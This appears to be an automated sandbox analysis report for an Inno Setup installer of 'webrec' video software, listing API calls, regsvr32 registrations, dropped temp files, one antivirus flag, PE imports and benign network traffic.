NtAllocateVirtualMemory
process_identifier: 2144
region_size: 352256
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x030f0000
success 0 0
1621007431.44659
NtAllocateVirtualMemory
process_identifier: 2144
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x022d0000
success 0 0
1621007431.50959
NtAllocateVirtualMemory
process_identifier: 2144
region_size: 360448
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x030f0000
success 0 0
Creates executable files on the filesystem (1 个事件)
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\is-T9ON8.tmp\_isetup\_shfoldr.dll
Creates a suspicious process (4 个事件)
cmdline "C:\Windows\system32\regsvr32.exe" /s "C:\Program Files (x86)\webrec\Single\DHDeviceConfig.ocx"
cmdline "C:\Windows\system32\regsvr32.exe" /s "C:\Program Files (x86)\webrec\Single\webrec.ocx"
cmdline "C:\Windows\system32\regsvr32.exe" /s "C:\Program Files (x86)\webrec\Single\DvrInterVideo.ocx"
cmdline "C:\Windows\system32\regsvr32.exe" /s "C:\Program Files (x86)\webrec\Single\VideoWindow.ocx"
Drops an executable to the user AppData folder (3 个事件)
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\is-T9ON8.tmp\_isetup\_shfoldr.dll
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\is-EB9J7.tmp\d9b4cd775a5c49cc3b6a04f71fcb5938.tmp
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\is-T9ON8.tmp\_isetup\_RegDLL.tmp
File has been identified by one AntiVirus engine on VirusTotal as malicious (1 个事件)
F-Prot W32/Downloader.F.gen!Eldorado
Queries for potentially installed applications (4 个事件)
Time & API Arguments Status Return Repeated
1621007384.903876
RegOpenKeyExA
access: 0x00000001
base_handle: 0x80000001
key_handle: 0x00000000
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\{537BEA13-6EAB-4CF1-A3EF-DA81D8CD9870}_is1
regkey_r: Software\Microsoft\Windows\CurrentVersion\Uninstall\{537BEA13-6EAB-4CF1-A3EF-DA81D8CD9870}_is1
options: 0
failed 2 0
1621007384.903876
RegOpenKeyExA
access: 0x00000001
base_handle: 0x80000002
key_handle: 0x00000000
regkey: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\{537BEA13-6EAB-4CF1-A3EF-DA81D8CD9870}_is1
regkey_r: Software\Microsoft\Windows\CurrentVersion\Uninstall\{537BEA13-6EAB-4CF1-A3EF-DA81D8CD9870}_is1
options: 0
failed 2 0
1621007436.060876
RegOpenKeyExA
access: 0x00000008
base_handle: 0x80000001
key_handle: 0x00000000
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\{537BEA13-6EAB-4CF1-A3EF-DA81D8CD9870}_is1
regkey_r: Software\Microsoft\Windows\CurrentVersion\Uninstall\{537BEA13-6EAB-4CF1-A3EF-DA81D8CD9870}_is1
options: 0
failed 2 0
1621007436.060876
RegOpenKeyExA
access: 0x00000008
base_handle: 0x80000002
key_handle: 0x00000000
regkey: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\{537BEA13-6EAB-4CF1-A3EF-DA81D8CD9870}_is1
regkey_r: Software\Microsoft\Windows\CurrentVersion\Uninstall\{537BEA13-6EAB-4CF1-A3EF-DA81D8CD9870}_is1
options: 0
failed 2 0
可视化分析
二进制图像
暂无二进制图像 该样本未生成二进制可视化图像
运行截图
暂无运行截图 该样本运行过程中未生成截图

👋 欢迎使用 ChatHawk

我是您的恶意软件分析助手,可以帮您分析和解读恶意软件报告。请随时向我提问!

🔍 主要威胁分析
⚡ 行为特征
🛡️ 防护建议
🔧 技术手段
🎯 检测方法
🤖

PE Compile Time

1992-06-20 06:22:17

Imports

Library kernel32.dll:
0x40d0c4 VirtualFree
0x40d0c8 VirtualAlloc
0x40d0cc LocalFree
0x40d0d0 LocalAlloc
0x40d0d4 WideCharToMultiByte
0x40d0d8 TlsSetValue
0x40d0dc TlsGetValue
0x40d0e0 MultiByteToWideChar
0x40d0e4 GetModuleHandleA
0x40d0e8 GetLastError
0x40d0ec GetCommandLineA
0x40d0f0 WriteFile
0x40d0f4 SetFilePointer
0x40d0f8 SetEndOfFile
0x40d0fc RtlUnwind
0x40d100 ReadFile
0x40d104 RaiseException
0x40d108 GetStdHandle
0x40d10c GetFileSize
0x40d110 GetSystemTime
0x40d114 GetFileType
0x40d118 ExitProcess
0x40d11c CreateFileA
0x40d120 CloseHandle
Library user32.dll:
0x40d128 MessageBoxA
Library oleaut32.dll:
0x40d130 VariantChangeTypeEx
0x40d134 VariantCopyInd
0x40d138 VariantClear
0x40d13c SysStringLen
0x40d140 SysAllocStringLen
Library advapi32.dll:
0x40d148 RegQueryValueExA
0x40d14c RegOpenKeyExA
0x40d150 RegCloseKey
0x40d154 OpenProcessToken
Library kernel32.dll:
0x40d160 WriteFile
0x40d164 VirtualQuery
0x40d168 VirtualProtect
0x40d16c VirtualFree
0x40d170 VirtualAlloc
0x40d174 Sleep
0x40d178 SizeofResource
0x40d17c SetLastError
0x40d180 SetFilePointer
0x40d184 SetErrorMode
0x40d188 SetEndOfFile
0x40d18c RemoveDirectoryA
0x40d190 ReadFile
0x40d194 LockResource
0x40d198 LoadResource
0x40d19c LoadLibraryA
0x40d1a0 IsDBCSLeadByte
0x40d1a8 GetVersionExA
0x40d1b0 GetSystemInfo
0x40d1b8 GetProcAddress
0x40d1bc GetModuleHandleA
0x40d1c0 GetModuleFileNameA
0x40d1c4 GetLocaleInfoA
0x40d1c8 GetLastError
0x40d1cc GetFullPathNameA
0x40d1d0 GetFileSize
0x40d1d4 GetFileAttributesA
0x40d1d8 GetExitCodeProcess
0x40d1e0 GetCurrentProcess
0x40d1e4 GetCommandLineA
0x40d1e8 GetACP
0x40d1ec InterlockedExchange
0x40d1f0 FormatMessageA
0x40d1f4 FindResourceA
0x40d1f8 DeleteFileA
0x40d1fc CreateProcessA
0x40d200 CreateFileA
0x40d204 CreateDirectoryA
0x40d208 CloseHandle
Library user32.dll:
0x40d210 TranslateMessage
0x40d214 SetWindowLongA
0x40d218 PeekMessageA
0x40d220 MessageBoxA
0x40d224 LoadStringA
0x40d228 ExitWindowsEx
0x40d22c DispatchMessageA
0x40d230 DestroyWindow
0x40d234 CreateWindowExA
0x40d238 CallWindowProcA
0x40d23c CharPrevA
Library comctl32.dll:
0x40d244 InitCommonControls
Library advapi32.dll:

Hosts

No hosts contacted.

TCP

Source Source Port Destination Destination Port
192.168.56.101 49202 203.208.41.98 update.googleapis.com 443

UDP

Source Source Port Destination Destination Port
192.168.56.101 50002 114.114.114.114 53
192.168.56.101 50568 114.114.114.114 53
192.168.56.101 53237 114.114.114.114 53
192.168.56.101 53380 114.114.114.114 53
192.168.56.101 57756 114.114.114.114 53
192.168.56.101 62318 114.114.114.114 53
192.168.56.101 65004 114.114.114.114 53
192.168.56.101 137 192.168.56.255 137
192.168.56.101 138 192.168.56.255 138
192.168.56.101 123 20.189.79.72 time.windows.com 123
192.168.56.101 49235 224.0.0.252 5355
192.168.56.101 51963 224.0.0.252 5355
192.168.56.101 53657 224.0.0.252 5355
192.168.56.101 56804 224.0.0.252 5355
192.168.56.101 57874 224.0.0.252 5355
192.168.56.101 58367 224.0.0.252 5355
192.168.56.101 60384 224.0.0.252 5355
192.168.56.101 62191 224.0.0.252 5355
192.168.56.101 62912 224.0.0.252 5355
192.168.56.101 63429 224.0.0.252 5355

HTTP & HTTPS Requests

No HTTP requests performed.

ICMP traffic

No ICMP traffic performed.

IRC traffic

No IRC requests performed.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Snort Alerts

No Snort Alerts

Sorry! No dropped files.
Sorry! No dropped buffers.